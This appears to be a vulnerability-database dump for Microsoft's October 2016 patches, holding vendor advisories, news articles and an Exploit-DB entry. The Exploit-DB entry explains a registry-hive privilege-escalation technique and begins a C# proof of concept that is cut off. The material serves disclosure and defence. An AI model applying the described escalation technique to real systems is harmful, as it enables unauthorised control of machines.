Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of successful exploits.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "SMNTC-93378", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/93378", "type": "symantec", "title": "Microsoft Windows CVE-2016-0142 Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-13T06:16:59", "bulletinFamily": "software", "cvelist": ["CVE-2016-7188"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. Local attackers can exploit this issue to execute arbitrary code with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "SMNTC-93359", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/93359", "type": "symantec", "title": "Microsoft Windows Diagnostics Hub CVE-2016-7188 Local Privilege Escalation Vulnerability", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-14T22:41:43", "bulletinFamily": "software", "cvelist": ["CVE-2016-3266"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability that occurs in the Windows kernel. A local attacker can exploit this issue to execute arbitrary code in kernel mode with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "SMNTC-93384", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/93384", "type": "symantec", "title": "Microsoft Windows Kernel 'Win32k.sys' CVE-2016-3266 Local Privilege Escalation Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-14T22:39:57", "bulletinFamily": "software", "cvelist": ["CVE-2016-3393"], "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits may allow an attacker to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista SP2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "SMNTC-93377", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/93377", "type": "symantec", "title": "Microsoft Windows Graphics Component CVE-2016-3393 Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T09:18:13", "bulletinFamily": "info", "cvelist": ["CVE-2016-3393", "CVE-2016-3298", "CVE-2016-0142", "CVE-2016-7193", "CVE-2016-7189"], "description": "[](<https://4.bp.blogspot.com/-TzzYx_0-Deg/V_3dkB1aGfI/AAAAAAAApxI/T3KeDs2k-G4XR4gCKD9qvmrMirxqiLmWQCLcB/s1600/microsoft-cumulative-Patch-updates.png>)\n\nMicrosoft has released its monthly Patch Tuesday update including a total of 10 security bulletin, and you are required to apply the whole package of patches altogether, whether you like it or not. \n \nThat's because the company is kicking off a controversial new all-or-nothing patch model this month by packaging all security updates into a single payload, removing your ability to pick and choose which individual patches to install. \n \n[October's patch bundle](<https://technet.microsoft.com/en-us/library/security/MS16-OCT>) includes fixes for at least 5 separate dangerous zero-day vulnerabilities in Internet Explorer, Edge, Windows and Office products that attackers were already exploiting in the wild before the patch release. \n \nThe patches for these zero-day flaws are included in MS16-118, MS16-119, MS16-120, MS16-121 and MS16-126. All the zero-days are being exploited in the wild, allowing attackers to execute a remote command on victim's system. \n \nAlthough none of the zero-day flaws were publicly disclosed prior to Tuesday, the company was aware of attacks exploiting these flaws, said Microsoft. \n \n\n\n### Here's the list of Zero-Day Vulnerabilities:\n\n \n\n\n 1. **CVE-2016-3298**: An Internet Explorer zero-day flaw is a browser information disclosure vulnerability patched in MS16-118 bulletin among 11 other vulnerabilities. It could allow attackers to \"test for the presence of files on disk.\"\n 2. **CVE-2016-7189**: A zero-day in the browser's scripting engine has been patched in Microsoft Edge bulletin, MS16-119, among others. The flaw is a remote code execution vulnerability.\n 3. **CVE-2016-3393**: Another zero-day in Microsoft Windows Graphics Component has been addressed in MS16-120 that could be exploited over the web, or via an email containing malicious file or over a file-sharing app to conduct RCE attack.\n 4. **CVE-2016-7193**: A single zero-day in Office has been addressed in MS16-121 bulletin. The flaw is a remote code execution vulnerability caused by the way Office handles RTF files.\n 5. **CVE-2016-3298**: The last publicly attacked zero-day has been patched in MS16-126, which is the only zero-day that is not rated critical, just moderate. The flaw is an information disclosure bug affecting Vista, Windows 7 and 8 and exists in the Microsoft Internet Messaging API.\nAnother bulletin rated critical is MS16-122 that patches a remote code execution flaw, CVE-2016-0142, in the Windows Video Control, affecting Windows Vista, 7, 8 and 10. The bug can be exploited when a user opens a crafted file or app from the web page or email. \n \nMicrosoft also patched twelve vulnerabilities in Adobe Flash Player for Windows 8.1, Windows 10, and Server 2012 in MS16-127. \n \nRest bulletins rated important or moderate, including MS16-123, MS16-124 and MS16-125, patches five elevation of privilege vulnerabilities in Windows Kernel-Mode, four elevation of privilege vulnerabilities in Windows Registry, and an elevation of privilege flaw in Windows Diagnostics Hub respectively. \n \n\n\n### Adobe Patch Update\n\n \nAdobe also [released](<https://helpx.adobe.com/security/products/flash-player/apsb16-32.html>) a new version of Flash Player today that patched a dozen of vulnerabilities in its software, most of which were remote code execution flaws. \n \nAdobe has also published code clean-ups for 71(!) CVE-listed security flaws in [Acrobat and Reader](<https://helpx.adobe.com/security/products/acrobat/apsb16-33.html>), along with [a fix](<https://helpx.adobe.com/security/products/creative-cloud/apsb16-34.html>) for a single elevation of privilege bug in Creative Cloud. \n \nUsers are advised to apply Windows and Adobe patches to keep away hackers and cybercriminals from taking control over your computer. \n \nA system reboot is necessary for installing updates, so admins are advised to save work on PCs where the whole package of patches is deployed before initiating the process.\n", "modified": "2016-10-12T07:41:05", "published": "2016-10-11T20:41:00", "id": "THN:231C21CDC15C09B8A58B71A738D875F1", "href": "https://thehackernews.com/2016/10/Microsoft-security-patch-updates.html", "type": "thn", "title": "Microsoft Patches 5 Zero-Day Vulnerabilities Being Exploited in the Wild", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:54:37", "bulletinFamily": "info", "cvelist": ["CVE-2016-0142", "CVE-2016-3298", "CVE-2016-3393", "CVE-2016-7189", "CVE-2016-7193"], "description": "**Update: **_Microsoft today said it mislabeled CVE-2016-7189 in bulletin MS16-119 as exploited. \u201c_There is no evidence of any active attacks using this vulnerability and the bulletin text has been corrected.\u201d _\u2013 a Microsoft spokesperson said._\n\nMicrosoft today patched a handful of zero-day vulnerabilities that have been publicly attacked in Internet Explorer, Edge, Windows and Office products. The security updates were included among [10 Patch Tuesday bulletins](<https://technet.microsoft.com/en-us/library/security/MS16-OCT>), half of which were rated critical by Microsoft.\n\nToday also signaled the first time Microsoft issued security updates for older Windows versions (Windows 7 and 8, and Windows Server 2008 and 2012) as single, cumulative security and feature updates.\n\nLast week Microsoft announced that admins will have [three choices for patch distribution](<https://blogs.technet.microsoft.com/windowsitpro/2016/10/07/more-on-windows-7-and-windows-8-1-servicing-changes/>) going forward: a single update that includes all new patches for the month available on WSUS; a monthly security update that includes new patches for the month and patches from previous monthly rollups available via Windows Update; and a monthly rollup with a preview of upcoming feature updates and patches from previous rollups to be delivered via WSUS on the third Tuesday of every month.\n\nNone of the zero-day vulnerabilities were publicly disclosed prior to today, but Microsoft said it was aware of attacks exploiting the flaws.\n\nThe Internet Explorer zero day, CVE-2016-3298, was one of 11 remote code execution flaws patched in a cumulative update, [MS16-118](<https://technet.microsoft.com/library/security/MS16-118>). The flaw is an information-disclosure vulnerability and could allow an attacker to \u201ctest for the presence of files on disk,\u201d Microsoft said, adding that a user would have to visit a malicious website via IE 9-11 to trigger the vulnerability. The update also patches a mix of memory corruption and privilege elevation flaws, all of which enable remote code execution.\n\nThe Microsoft Edge bulletin, [MS16-119](<https://technet.microsoft.com/library/security/MS16-119>), also includes a patch for a zero day, CVE-2016-7189, in the browser\u2019s scripting engine.\n\n\u201cA remote code execution vulnerability exists when Microsoft Edge improperly handles objects in memory,\u201d Microsoft said in its advisory. \u201cAn attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\u201d\n\nThe zero day is one of 13 vulnerabilities patched in Edge, most of which are memory corruption flaws in the browser.\n\nAnother zero day, CVE-2016-3393, was addressed in Microsoft Windows Graphics Component in [MS16-020](<https://technet.microsoft.com/library/security/MS16-120>). Attackers could exploit this flaw over the web, or through a malicious file attached to an email or sent over a file-sharing application.\n\nThe bulletin patches eight vulnerabilities overall in Graphics Component, GDI+ and True Type Font Parsing, which is used in Windows, Office, Skype for Business, Silverlight and Microsoft Lync, exposing those applications to remote code execution.\n\nAn Office zero-day, CVE-2016-7193, was also patched in [MS16-121](<https://technet.microsoft.com/library/security/MS16-121>), the lone vulnerability addressed in the bulletin. Microsoft said the flaw is a remote code execution vulnerability caused by the way Office handles RTF files. An attacker would have to convince a victim to open an infected file with an Office application.\n\nThe remaining publicly attacked zero day, CVE-2016-3298, was in the Microsoft Internet Messaging API and patched in [MS16-126](<https://technet.microsoft.com/library/security/MS16-126>). The flaw is an information disclosure vulnerability affecting Vista, Windows 7 and 8. The protocol was used by email clients such as Outlook and Exchange Server to communicate access public and private files and folders; that is no longer the case.\n\nThe remaining bulletin rated critical, [MS16-122](<https://technet.microsoft.com/library/security/MS16-122>), patches a vulnerability in the Windows Video Control. The vulnerability, CVE-2016-0142, is a remote code execution bug in Windows Vista, 7, 8 and 10 and can be exploited by a user opening a crafted file or application from the Internet or email. The vulnerability can be triggered from the Preview Pane, Microsoft said.\n\nMicrosoft also patched Adobe Flash Player native to Internet Explorer and Edge in [MS16-127](<https://technet.microsoft.com/library/security/MS16-127>); a new version of Flash Player was released today by Adobe that patched a [dozen vulnerabilities](<https://threatpost.com/adobe-fixes-81-vulnerabilities-in-acrobat-reader-flash/121206/>) in the software, most of which were remote code execution.\n\nThe remaining bulletins were rated important or moderate severity by Microsoft:\n\n * [MS16-123](<https://technet.microsoft.com/library/security/MS16-123>): Patches five elevation of privilege vulnerabilities in Windows Kernel-Mode Drivers\n * [MS16-124](<https://technet.microsoft.com/library/security/MS16-124>): Patches four elevation of privilege vulnerabilities in Windows Registry\n * [MS16-125](<https://technet.microsoft.com/library/security/MS16-124>): Patches an elevation of privilege flaw in Windows Diagnostics Hub\n", "modified": "2016-10-12T23:10:32", "published": "2016-10-11T15:18:35", "id": "THREATPOST:4C8F3F4DC21FE42681CBD7DA2E0E2B7C", "href": "https://threatpost.com/microsoft-patches-five-zero-days-under-attack/121211/", "type": "threatpost", "title": "Microsoft Patches Five Zero Days Under Attack", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mscve": [{"lastseen": "2020-08-07T11:48:17", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-3270"], "description": "An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.\n", "edition": 3, "modified": "2016-12-13T08:00:00", "id": "MS:CVE-2016-3270", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3270", "published": "2016-12-13T08:00:00", "title": "Win32k Elevation of Privilege Vulnerability", "type": "mscve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-07T11:48:33", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-3263"], "description": "An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. An attacker who successfully exploited this vulnerability could use the retrieved information to circumvent Address Space Layout Randomization (ASLR) in Windows, which helps guard against a broad class of vulnerabilities. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability, such as a remote code execution vulnerability, that is capable of leveraging the ASLR circumvention.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application.\n\nThe security update addresses the vulnerability, and helps protect the integrity of the ASLR security feature, by correcting how GDI handles memory addresses.\n", "edition": 3, "modified": "2016-12-13T08:00:00", "id": "MS:CVE-2016-3263", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3263", "published": "2016-12-13T08:00:00", "title": "GDI+ Information Disclosure Vulnerability", "type": "mscve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-08-07T11:45:34", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-3262"], "description": "An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. An attacker who successfully exploited this vulnerability could use the retrieved information to circumvent Address Space Layout Randomization (ASLR) in Windows, which helps guard against a broad class of vulnerabilities. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability, such as a remote code execution vulnerability, that is capable of leveraging the ASLR circumvention.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application.\n\nThe security update addresses the vulnerability, and helps protect the integrity of the ASLR security feature, by correcting how GDI handles memory addresses.\n", "edition": 3, "modified": "2016-12-13T08:00:00", "id": "MS:CVE-2016-3262", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3262", "published": "2016-12-13T08:00:00", "title": "GDI+ Information Disclosure Vulnerability", "type": "mscve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-08-07T11:48:22", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-3266"], "description": "An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.\n", "edition": 3, "modified": "2016-12-13T08:00:00", "id": "MS:CVE-2016-3266", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3266", "published": "2016-12-13T08:00:00", "title": "Win32k Elevation of Privilege Vulnerability", "type": "mscve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-07T11:48:31", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-3341"], "description": "An elevation of privilege vulnerability exists when the Windows Transaction Manager improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context.\n\nIn a local attack scenario, an attacker could exploit this vulnerability by running a specially crafted application to take control over the affected system.\n\nThe security update addresses the vulnerability by correcting how the Transaction Manager handles objects in memory.\n", "edition": 3, "modified": "2016-12-13T08:00:00", "id": "MS:CVE-2016-3341", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3341", "published": "2016-12-13T08:00:00", "title": "Windows Transaction Manager Elevation of Privilege Vulnerability", "type": "mscve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-07T11:48:23", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-3396"], "description": "A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nThere are multiple ways an attacker could exploit the vulnerability:\n\n * In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability and then convince users to view the website. An attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by getting them to click a link in an email or instant message that takes users to the attacker's website, or by opening an attachment sent through email.\n * In a file-sharing attack scenario, an attacker could provide a specially crafted document file that is designed to exploit the vulnerability and then convince users to open the document file. The security update addresses the vulnerability by correcting how the Windows font library handles embedded fonts.\n\nNote that where the severity is indicated as Critical in the Affected Products table, the Preview Pane is an attack vector for this vulnerability. The security update addresses the vulnerability by correcting how the Windows font library handles embedded fonts.\n", "edition": 3, "modified": "2016-12-13T08:00:00", "id": "MS:CVE-2016-3396", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3396", "published": "2016-12-13T08:00:00", "title": "GDI+ Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-07T11:48:30", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-3298"], "description": "An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n\nAn attacker who successfully exploited this vulnerability could test for the presence of files on disk. For an attack to be successful, an attacker must persuade a user to open a malicious website.\n\nThe security update addresses the vulnerability by changing the way Internet Explorer handles objects in memory.\n", "edition": 3, "modified": "2016-12-13T08:00:00", "id": "MS:CVE-2016-3298", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3298", "published": "2016-12-13T08:00:00", "title": "Internet Explorer Information Disclosure Vulnerability", "type": "mscve", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-08-07T11:48:16", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-0142"], "description": "A remote code execution vulnerability exists when Microsoft Video Control fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nTo exploit the vulnerability, an attacker would have to convince a user to open either a specially crafted file or application from either a webpage or an email message. The security update addresses the vulnerability by correcting how Microsoft Video Control handles objects in memory.\n\nNote that where the severity is indicated as Critical in the Affected Products table, the Preview Pane is an attack vector.\n", "edition": 3, "modified": "2016-12-13T08:00:00", "id": "MS:CVE-2016-0142", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0142", "published": "2016-12-13T08:00:00", "title": "Microsoft Video Control Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-07T11:48:33", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-0079"], "description": "An elevation of privilege vulnerability exists when the Windows Kernel API improperly allows a user to access sensitive registry information. An attacker who successfully exploited the vulnerability could gain access to user account information that is not intended for the user.\n\nA locally authenticated attacker could exploit this vulnerability by running a specially crafted application.\n\nThe security update addresses the vulnerability by helping to ensure that the Windows Kernel API correctly restricts access to user account information.\n", "edition": 2, "modified": "2016-10-11T07:00:00", "id": "MS:CVE-2016-0079", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0079", "published": "2016-10-11T07:00:00", "title": "Windows Kernel Local Elevation of Privilege Vulnerability", "type": "mscve", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-08-07T11:45:27", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-7188"], "description": "An elevation of privilege vulnerability exists when the Windows Diagnostics Hub Standard Collector Service fails to properly sanitize input, leading to an unsecure library-loading behavior. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application.\n\nThe security update addresses the vulnerability by correcting how the Windows Diagnostics Hub Standard Collector Service sanitizes input, to help preclude unintended elevated system privileges.\n", "edition": 2, "modified": "2016-10-11T07:00:00", "id": "MS:CVE-2016-7188", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-7188", "published": "2016-10-11T07:00:00", "title": "Windows Diagnostics Hub Elevation of Privilege Vulnerability", "type": "mscve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-10-21T01:30:31", "description": "Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124). CVE-2016-0079. Local exploit for Windows platform", "published": "2016-10-20T00:00:00", "type": "exploitdb", "title": "Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0079"], "modified": "2016-10-20T00:00:00", "id": "EDB-ID:40608", "href": "https://www.exploit-db.com/exploits/40608/", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=871\r\n\r\nWindows: NtLoadKeyEx Read Only Hive Arbitrary File Write EoP\r\nPlatform: Windows 10 10586 not tested 8.1 Update 2 or Windows 7\r\nClass: Elevation of Privilege\r\n\r\nSummary:\r\nNtLoadKeyEx takes a flag to open a registry hive read only, if one of the hive files cannot be opened for read access it will revert to write mode and also impersonate the calling process. This can leading to EoP if a user controlled hive is opened in a system service.\r\n\r\nDescription:\r\n\r\nOne of the flags to NtLoadKeyEx is to open a registry hive with read only access. When this flag is passed the main hive file is opened for Read only, and no log files are opened or created. However there\u2019s a bug in the kernel function CmpCmdHiveOpen, initially it calls CmpInitHiveFromFile passing flag 1 in the second parameter which means open read-only. However if this fails with a number of error codes, including STATUS_ACCESS_DENIED it will recall the initialization function while impersonating the calling process, but it forgets to pass the read only flag. This means if the initial access fails, it will instead open the hive in write mode which will create the log files etc.\r\n\r\nAn example where this is used is in the WinRT COM activation routines of RPCSS. The GetPrivateHiveKeyFromPackageFullName method explicitly calls NtLoadKeyEx with the read only flag (rather than calling RegLoadAppKey which will not). As this is opening a user ActivationStore.dat hive inside the AppData\\Local\\Packages directory in the user\u2019s profile it\u2019s possible to play tricks with symbolic links to cause the opening of the hive inside the DCOM service to fail as the normal user then write the log files out as SYSTEM (as it calls RtlImpersonateSelfEx). \r\n\r\nThis is made all the worse because of the behaviour of the file creation routines. When the log files are being created the kernel copies the DACL from the main hive file to the new log files. This means that although we don\u2019t really control the log file contents we can redirect the write to an arbitrary location (and using symlink tricks ensure the name is suitable) then reopen the file as it has an explicit DACL copied from the main hive we control and we can change the file\u2019s contents to whatever you like. \r\n\r\nProof of Concept:\r\n\r\nI\u2019ve provided a PoC as a C# source code file. You need to compile it first targetted .NET 4 and above. I\u2019ve verified you can exploit RPCSS manually, however without substantial RE it wouldn\u2019t be a very reliable PoC, so instead I\u2019ve just provided an example file you can fun as a normal user. This will impersonate the anonymous token while opening the hive (which in reality would be DACL\u2019ed to block the user from opening for read access) and we verify that the log files are created. \r\n\r\n1) Compile the C# source code file.\r\n2) Execute the PoC executable as a normal user.\r\n3) The PoC should print that it successfully opened the hive in write mode.\r\n\r\nExpected Result:\r\nThe hive fails to open, or at least only opens in read-only mode.\r\n\r\nObserved Result:\r\nThe hive is opened in write mode incorrectly which can be abused to elevate privileges. \r\n*/\r\n\r\nusing Microsoft.Win32;\r\nusing Microsoft.Win32.SafeHandles;\r\nusing System;\r\nusing System.Diagnostics;\r\nusing System.IO;\r\nusing System.Reflection;\r\nusing System.Runtime.InteropServices;\r\nusing System.Text;\r\nusing System.Threading;\r\n\r\nnamespace PoC_NtLoadKeyEx_ReadOnlyFlag_EoP\r\n{\r\n class Program\r\n {\r\n [Flags]\r\n public enum AttributeFlags : uint\r\n {\r\n None = 0,\r\n Inherit = 0x00000002,\r\n Permanent = 0x00000010,\r\n Exclusive = 0x00000020,\r\n CaseInsensitive = 0x00000040,\r\n OpenIf = 0x00000080,\r\n OpenLink = 0x00000100,\r\n KernelHandle = 0x00000200,\r\n ForceAccessCheck = 0x00000400,\r\n IgnoreImpersonatedDevicemap = 0x00000800,\r\n DontReparse = 0x00001000,\r\n }\r\n\r\n [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]\r\n public sealed class UnicodeString\r\n {\r\n ushort Length;\r\n ushort MaximumLength;\r\n [MarshalAs(UnmanagedType.LPWStr)]\r\n string Buffer;\r\n\r\n public 